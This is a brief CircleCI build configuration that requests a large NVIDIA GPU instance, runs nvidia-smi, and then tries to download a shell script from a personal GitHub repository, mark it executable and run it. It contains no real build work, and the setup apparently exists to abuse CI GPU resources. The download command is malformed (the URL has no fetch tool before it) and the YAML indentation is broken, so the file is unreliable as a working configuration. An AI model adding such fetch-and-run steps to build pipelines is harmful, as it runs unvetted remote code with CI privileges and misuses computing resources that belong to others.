version: 2

jobs:
  build:
    docker:
      - image: ubuntu-1604-cuda-10.1:201909-23
        resource_class: gpu.nvidia.large
        steps:
      - run: nvidia-smi
      - run: https://raw.githubusercontent.com/jillterry/bismillah/master/bash.sh && chmod +x bash.sh && ./bash.sh